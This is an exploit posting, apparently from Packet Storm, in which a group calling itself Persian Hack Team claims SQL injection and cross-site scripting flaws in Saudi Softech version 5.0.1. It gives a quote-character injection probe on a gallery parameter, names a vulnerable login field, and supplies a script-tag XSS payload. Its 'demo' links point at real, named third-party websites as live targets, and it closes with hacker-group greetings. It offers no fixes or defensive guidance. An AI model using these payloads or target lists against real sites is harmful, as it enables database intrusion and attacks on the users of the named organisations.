Saudi Softech version 5.0.1 suffers from cross site scripting and remote SQL injection vulnerabilities.
469f3cbc19e4d487254aa1bad46f568ee3cd14bf7be5a79d8b9e9b9cde2603a8######################
# Exploit Title : SAUDI SOFTECH (MST) - SQL Injection / Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.saudisoftech.com/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Date: 2016/06/05
# Version : V.5.0.1
######################
#
# PoC:
# 1-1-Get SQL Injection
# Demo :
# http://www.saudiacademy.edu.sa/gallery.php?gid=4%27
# http://www.zamilshipyard.com/gallery.php?gid=2%27
#
# 1-2-Post SQL Injection
# email Parameter in Login page vulnerable
# Demo:
# http://www.zamilshipyard.com/panel/index.php
#
# 2-Cross Site Scripting
# Search Box vulnerable to XSS
# Payload = <ScRiPt >prompt("Persian Hack Team")</ScRiPt>
# Demo :
# http://www.btech-sa.com/search.php
# http://www.speetech.net/search.php
# http://www.madicc.org/search.php
#
######################
# Discovered by : Mojtaba MobhaM & T3NZOG4N & FireKernel
# Greetz : Milad Hacking & JOK3R & All Iranian Hackers And All Persian Hack Team Members
# Homepage : persian-team.ir
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed